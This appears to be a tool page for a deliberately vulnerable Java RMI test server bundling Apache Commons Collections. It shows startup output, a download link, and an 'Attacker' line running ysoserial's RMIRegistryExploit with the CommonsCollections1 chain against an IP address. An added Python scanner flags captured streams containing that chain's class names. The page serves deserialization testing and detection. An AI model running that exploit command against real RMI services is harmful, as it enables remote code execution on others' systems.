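Function:
Start the jar from the command line with a user-specified RMI port. Apache Commons Collections is bundled by default, so a single command starts a target for testing Java deserialization vulnerabilities.
Starting the service: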
[root@sevck_v3 tmp]# java -jar rmi.jar 1201
This rmi port is: 1201
java rmi server start!
If the port is already bound:
[root@sevck_v3 tmp]# java -jar rmi.jar 1200
This rmi port is: 1200
java.rmi.server.ExportException: Port already in use: 1200; nested exception is:
    java.net.BindException: Address already in use (Bind failed)
    at sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:341)
    at sun.rmi.transport.tcp.TCPTransport.exportObject(TCPTransport.java:249)
    at sun.rmi.transport.tcp.TCPEndpoint.exportObject(TCPEndpoint.java:411)
    at sun.rmi.transport.LiveRef.exportObject(LiveRef.java:147)
    at sun.rmi.server.UnicastServerRef.exportObject(UnicastServerRef.java:236)
    at sun.rmi.registry.RegistryImpl.setup(RegistryImpl.java:213)
    at sun.rmi.registry.RegistryImpl.<init>(RegistryImpl.java:198)
    at java.rmi.registry.LocateRegistry.createRegistry(LocateRegistry.java:203)
    at rmi.server.Server.main(Server.java:62)
Caused by: java.net.BindException: Address already in use (Bind failed)
    at java.net.PlainSocketImpl.socketBind(Native Method)
    at java.net.AbstractPlainSocketImpl.bind(AbstractPlainSocketImpl.java:387)
    at java.net.ServerSocket.bind(ServerSocket.java:375)
    at java.net.ServerSocket.<init>(ServerSocket.java:237)
    at java.net.ServerSocket.<init>(ServerSocket.java:128)
    at sun.rmi.transport.proxy.RMIDirectSocketFactory.createServerSocket(RMIDirectSocketFactory.java:45)
    at sun.rmi.transport.proxy.RMIMasterSocketFactory.createServerSocket(RMIMasterSocketFactory.java:345)
    at sun.rmi.transport.tcp.TCPEndpoint.newServerSocket(TCPEndpoint.java:666)
    at sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:330)
    ... 8 more
Tool download: http://scan.javasec.cn/java/rmi.jar
Attacker:
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 121.42.182.208 1234 CommonsCollections1 "touch /tmp/test"
Download the ysoserial tool yourself from GitHub.
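
A defender-side view of the traffic this test server receives, as an added example that is not part of the original page or of rmi.jar: a heuristic Python scanner that checks a captured client-to-server byte stream for the JRMP header, the Java serialization magic, and class descriptors used by the CommonsCollections1 chain. The function names and the sample byte strings are constructed for illustration.

```python
import re
import struct

JRMP_MAGIC = b"JRMI"                 # RMI transport header
STREAM_MAGIC = b"\xac\xed\x00\x05"   # Java serialization magic + version
TC_CLASSDESC = 0x72                  # tag that introduces a class descriptor
CLASS_NAME = re.compile(r"^\[*[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)+;?$")
# Classes used by the CommonsCollections1 chain named on this page.
SUSPICIOUS_PREFIXES = (
    "org.apache.commons.collections.functors.",
    "org.apache.commons.collections.map.LazyMap",
    "sun.reflect.annotation.AnnotationInvocationHandler",
)

def class_names(data: bytes) -> list[str]:
    """Heuristically list class names declared by TC_CLASSDESC records."""
    names, i = [], 0
    while (i := data.find(bytes([TC_CLASSDESC]), i)) != -1:
        i += 1
        if i + 2 > len(data):
            break
        (n,) = struct.unpack_from(">H", data, i)
        raw = data[i + 2 : i + 2 + n]
        # A real descriptor is followed by an 8-byte serialVersionUID and a flags byte.
        if 0 < n == len(raw) and i + 2 + n + 9 <= len(data):
            name = raw.decode("utf-8", "replace")
            if CLASS_NAME.match(name) and name not in names:
                names.append(name)
    return names

def inspect_stream(captured: bytes) -> dict:
    """Summarize one client-to-server byte stream seen on an RMI port."""
    start = captured.find(STREAM_MAGIC)
    found = class_names(captured[start:]) if start != -1 else []
    return {
        "jrmp": captured.startswith(JRMP_MAGIC),
        "serialized": start != -1,
        "suspicious": [c for c in found if c.startswith(SUSPICIOUS_PREFIXES)],
    }

def make_desc(name: str) -> bytes:
    # Constructed class-descriptor header with no fields, for the demo only.
    b = name.encode()
    return b"\x72" + struct.pack(">H", len(b)) + b + bytes(8) + b"\x02\x00\x00\x78\x70"

# Constructed samples: descriptor headers only, not a working object graph.
BENIGN = JRMP_MAGIC + b"\x00\x02\x4b\x50" + STREAM_MAGIC + make_desc("java.lang.Integer")
FLAGGED = JRMP_MAGIC + b"\x00\x02\x4b\x50" + STREAM_MAGIC + make_desc(
    "org.apache.commons.collections.functors.InvokerTransformer")
```

The scan is a byte-pattern heuristic rather than a full stream parser, so treat a hit as a signal to inspect the connection, not as proof of exploitation.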